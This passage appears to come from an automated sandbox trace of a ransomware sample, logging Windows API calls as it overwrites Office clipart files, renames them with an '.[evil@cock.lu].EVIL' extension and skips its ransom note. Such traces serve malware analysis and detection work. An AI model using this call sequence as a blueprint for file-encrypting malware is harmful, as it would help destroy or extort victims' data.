_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.057] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 69 [0150.057] wcscmp (_String1="J0187817.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.057] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187817.WMF") returned 0x0 [0150.057] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF") returned 0x45 [0150.057] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.060] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2d7c, lpOverlapped=0x0) returned 1 [0150.074] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.074] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.074] _errno () returned 0x84b1160840 [0150.074] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.074] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2d80, lpOverlapped=0x0) returned 1 [0150.074] CloseHandle (hObject=0x1a8) returned 1 [0150.074] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.075] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.075] __uncaught_exception () returned 0x84b1160800 [0150.075] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.075] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187817.wmf.[evil@cock.lu].evil")) returned 1 [0150.076] ??_V@YAXPEAX@Z () returned 0x1 [0150.079] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187817.WMF", dwFileAttributes=0x200) returned 0 [0150.079] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.079] wcsstr (_Str="J0187819.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.079] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 69 [0150.079] wcscmp (_String1="J0187819.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.079] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187819.WMF") returned 0x0 [0150.079] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF") returned 0x45 [0150.080] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.082] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2870, lpOverlapped=0x0) returned 1 [0150.085] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.085] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.085] _errno () returned 0x84b1160840 [0150.085] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.085] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2880, lpOverlapped=0x0) returned 1 [0150.085] CloseHandle (hObject=0x1a8) returned 1 [0150.085] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.086] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.086] __uncaught_exception () returned 0x84b1160800 [0150.086] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.086] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187819.wmf.[evil@cock.lu].evil")) returned 1 [0150.087] ??_V@YAXPEAX@Z () returned 0x1 [0150.090] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187819.WMF", dwFileAttributes=0x200) returned 0 [0150.090] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.090] wcsstr (_Str="J0187825.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.090] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 69 [0150.090] wcscmp (_String1="J0187825.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.090] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187825.WMF") returned 0x0 [0150.090] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF") returned 0x45 [0150.090] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.092] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1d4c, lpOverlapped=0x0) returned 1 [0150.095] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.095] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.095] _errno () returned 0x84b1160840 [0150.095] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.095] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1d60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1d60, lpOverlapped=0x0) returned 1 [0150.095] CloseHandle (hObject=0x1a8) returned 1 [0150.095] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.096] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.096] __uncaught_exception () returned 0x84b1160800 [0150.096] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.096] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187825.wmf.[evil@cock.lu].evil")) returned 1 [0150.097] ??_V@YAXPEAX@Z () returned 0x1 [0150.099] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187825.WMF", dwFileAttributes=0x200) returned 0 [0150.100] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.100] wcsstr (_Str="J0187829.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.100] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 69 [0150.100] wcscmp (_String1="J0187829.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.100] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187829.WMF") returned 0x0 [0150.100] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF") returned 0x45 [0150.100] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.102] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3040, lpOverlapped=0x0) returned 1 [0150.107] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.107] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.107] _errno () returned 0x84b1160840 [0150.107] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.108] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x3060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3060, lpOverlapped=0x0) returned 1 [0150.108] CloseHandle (hObject=0x1a8) returned 1 [0150.108] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.108] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.108] __uncaught_exception () returned 0x84b1160800 [0150.108] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.108] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187829.wmf.[evil@cock.lu].evil")) returned 1 [0150.109] ??_V@YAXPEAX@Z () returned 0x1 [0150.112] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187829.WMF", dwFileAttributes=0x200) returned 0 [0150.112] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.112] wcsstr (_Str="J0187835.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.112] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 69 [0150.112] wcscmp (_String1="J0187835.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.112] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187835.WMF") returned 0x0 [0150.112] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF") returned 0x45 [0150.113] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.114] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2480, lpOverlapped=0x0) returned 1 [0150.117] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.117] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.117] _errno () returned 0x84b1160840 [0150.117] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.117] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x24a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x24a0, lpOverlapped=0x0) returned 1 [0150.117] CloseHandle (hObject=0x1a8) returned 1 [0150.117] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.118] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.118] __uncaught_exception () returned 0x84b1160800 [0150.118] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.118] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187835.wmf.[evil@cock.lu].evil")) returned 1 [0150.119] ??_V@YAXPEAX@Z () returned 0x1 [0150.123] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187835.WMF", dwFileAttributes=0x200) returned 0 [0150.123] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.123] wcsstr (_Str="J0187837.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.123] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 69 [0150.123] wcscmp (_String1="J0187837.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.123] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187837.WMF") returned 0x0 [0150.123] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF") returned 0x45 [0150.124] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.125] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3fe2, lpOverlapped=0x0) returned 1 [0150.128] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.128] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.128] _errno () returned 0x84b1160840 [0150.128] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.128] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4000, lpOverlapped=0x0) returned 1 [0150.128] CloseHandle (hObject=0x1a8) returned 1 [0150.128] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.129] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.129] __uncaught_exception () returned 0x84b1160800 [0150.129] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.129] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187837.wmf.[evil@cock.lu].evil")) returned 1 [0150.130] ??_V@YAXPEAX@Z () returned 0x1 [0150.133] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187837.WMF", dwFileAttributes=0x200) returned 0 [0150.133] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.133] wcsstr (_Str="J0187839.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.133] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 69 [0150.133] wcscmp (_String1="J0187839.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.133] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187839.WMF") returned 0x0 [0150.133] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF") returned 0x45 [0150.133] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.138] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x14fc, lpOverlapped=0x0) returned 1 [0150.207] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.208] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.208] _errno () returned 0x84b1160840 [0150.208] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.208] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1500, lpOverlapped=0x0) returned 1 [0150.208] CloseHandle (hObject=0x1a8) returned 1 [0150.208] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.208] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.208] __uncaught_exception () returned 0x84b1160800 [0150.208] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.208] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187839.wmf.[evil@cock.lu].evil")) returned 1 [0150.209] ??_V@YAXPEAX@Z () returned 0x1 [0150.212] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187839.WMF", dwFileAttributes=0x200) returned 0 [0150.212] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.212] wcsstr (_Str="J0187847.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.212] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 69 [0150.212] wcscmp (_String1="J0187847.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.212] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187847.WMF") returned 0x0 [0150.212] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF") returned 0x45 [0150.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0150.214] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1bcc, lpOverlapped=0x0) returned 1 [0150.233] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.233] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0150.233] _errno () returned 0x84b1160840 [0150.233] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0150.233] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1be0, lpOverlapped=0x0) returned 1 [0150.233] CloseHandle (hObject=0x1a8) returned 1 [0150.233] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0150.234] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0150.234] __uncaught_exception () returned 0x84b1160800 [0150.234] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0150.234] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187847.wmf.[evil@cock.lu].evil")) returned 1 [0150.235] ??_V@YAXPEAX@Z () returned 0x1 [0150.237] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187847.WMF", dwFileAttributes=0x200) returned 0 [0150.238] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0150.238] wcsstr (_Str="J0187849.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0150.238] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 69 [0150.238] wcscmp (_String1="J0187849.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0150.238] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0187849.WMF") returned 0x0 [0150.238] wcslen (_String="C:\\\\Program Files\\Microsoft 